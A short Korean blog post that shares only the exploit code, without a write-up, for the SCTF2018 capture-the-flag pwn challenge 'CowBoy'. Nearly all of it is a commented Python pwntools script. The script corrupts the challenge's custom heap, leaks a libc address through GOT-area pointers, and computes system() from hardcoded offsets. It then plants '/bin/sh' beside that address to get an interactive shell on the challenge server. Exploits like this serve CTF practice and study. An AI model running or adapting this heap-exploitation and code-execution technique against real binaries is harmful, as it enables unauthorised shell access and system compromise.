


[SCTF2018] CowBoy (only exploit code)

유뱃 2018. 7. 31. 02:36

 라이트업으로 쓰려고 했는데, 기억이 가물가물해서 그냥 익스플로잇 코드만 올립니다. (아래 코드는 Python 2 / pwntools 기준이며, 오프셋 0x3AF60·0x45390은 함께 배포된 libc 빌드에 맞춘 값입니다.)


CowBoy_libc_56d992a0342a67a887b8dcaae381d2cc51205253

CowBoy_fb009bfafd91a8c5211c959cc3a5fc7a4ae8ad5d


from pwn import *
import json
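context.log_level = 'DEBUG'

# Local-debugging variants, kept for reference: run the challenge binary with
# the bundled libc via LD_PRELOAD and/or attach gdb.  The remote() line below
# is what the actual solve used.
#s = process("./cowboy",env={"LD_PRELOAD":'./libc.so.6'})
#gdb.attach(s)
#a = remote("127.0.0.1",1234)
s = remote("cowboy.eatpwnnosleep.com",14697)

# The service expects a JSON handshake before it shows the menu.
# NOTE(review): 'key' is the value this solve sent; whether the server
# validates it at all is not visible from here.
a = {
    'apikey' : 'key',
}
s.send(json.dumps(a).encode())
# print() with a single argument behaves the same on Python 2 and 3; the
# original 2.x print statement is a SyntaxError under Python 3.
print(s.recv(4096))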
def alloc(size):
    """Menu option 1: allocate a chunk of `size` bytes on the custom heap.

    Answers the size prompt (it ends in "2049:", presumably the maximum
    accepted size) and returns the chunk address the service echoes back
    after "= 0x".  Exactly 11 hex digits are consumed, which is how the
    service printed it during the solve; a differently padded address
    would be mis-parsed.  Short sleeps keep the prompts and our answers
    from interleaving on the remote side.
    """
    sleep(0.2)
    s.sendline("1")
    sleep(0.2)
    s.recvuntil("2049:")
    s.sendline(str(size))
    sleep(0.2)
    s.recvuntil("= 0x")
    addr_hex = s.recv(11)
    return int(addr_hex, 16)

def fill_data(bum,cum,data):
    """Menu option 4: write `data` into the slot selected by (bum, cum).

    The two numeric prompts are answered in order (bum first, then cum);
    what each index selects is challenge-specific and not visible here.
    `data` is sent raw with s.send(), so no newline is appended, and the
    service's response is drained and discarded.
    """
    sleep(0.2)
    s.sendline("4")
    for index in (bum, cum):
        sleep(0.2)
        s.recvuntil(":")
        s.sendline(str(index))
    sleep(0.2)
    s.send(data)
    s.recv(2048)

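def show_da(flag):
    """Menu option 3: dump the service's view of the chunks and parse one
    address out of it.

    flag == 1: take the first value printed as "0x7..." — the "7" is eaten
               by recvuntil and re-prefixed, giving a 12-hex-digit pointer
               (the caller subtracts a libc offset from it).
    flag == 0: skip five "0x" prefixes and read the 7 hex digits after the
               fifth (the caller stores this as a heap leak).
    Any other flag is rejected with ValueError; the original fell through
    with `leak` unassigned and raised UnboundLocalError at the return.
    The rest of the menu output is drained before returning.
    """
    s.sendline("3")
    sleep(0.2)
    if flag == 1:
        s.recvuntil("0x7")
        leak = int("7" + s.recv(11), 16)
    elif flag == 0:
        for _ in range(5):
            s.recvuntil("0x")
        leak = int(s.recv(7), 16)
    else:
        raise ValueError("show_da: flag must be 0 or 1, got %r" % (flag,))
    s.recv(2048)
    return leak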

def free_da(bum,cum):
    """Menu option 2: free the slot selected by (bum, cum).

    Mirrors fill_data's prompt handling: bum is sent at the first ":"
    prompt, cum at the second, and the service's reply is drained.
    """
    s.sendline("2")
    for index in (bum, cum):
        sleep(0.2)
        s.recvuntil(":")
        s.sendline(str(index))
    s.recv(2048)

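# Named free_got by the author: 0x602018 is the first .got.plt function slot
# of a typical non-PIE x86-64 binary — confirm against the challenge binary.
free_got = 0x602018
# Skip the banner (two rule lines plus the following newline) up to the menu.
s.recvuntil("----------------------------------------")
s.recvuntil("----------------------------------------")
s.recvuntil("\n")


# Stage 1: one chunk on the custom heap; its address is reused in stage 3.
heap = alloc(100)

# Stage 2: write pointer values (0x602090 and free_got-8 = 0x602010, both in
# the GOT area) into slot (3,0), allocate again, and let show_da print what
# those pointers reference.  The first 0x7... value it prints is assumed to
# sit 0x3AF60 past the libc base in the supplied libc build; that offset and
# 0x45390 (system) below are tied to that exact libc.
fill_data(3,0,p64(0x602090)*2+p64(free_got-8)*5)
alloc(100)
libc_base = show_da(1)-0x3AF60
# Same trick with 0x6020f8 to obtain the heap-side leak (logged only; the
# remaining steps use `heap` from stage 1 rather than this value).
fill_data(3,1,p64(0x6020f8)*10)
alloc(100)
heap_leak = show_da(0)
system_libc = libc_base+0x45390

# Stage 3: point slot (0,0) at heap+0x10, free slot (2,0), then refill it so
# "/bin/sh\0" is immediately followed by the address of system().
alloc(0)
fill_data(0,0,p64(heap+0x10)*2)
alloc(50)
free_da(2,0)
# b"" so the literal concatenates with p64()'s bytes on Python 3 as well; on
# Python 2 b"" and "" are the same type, so behaviour there is unchanged.
fill_data(2,0,b"/bin/sh\x00"+p64(system_libc)*2)

log.info("custem_heap : " + hex(heap))
log.info("libc_leak : " + hex(libc_base))
log.info("heap_leak : " + hex(heap_leak))

s.interactive()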

 
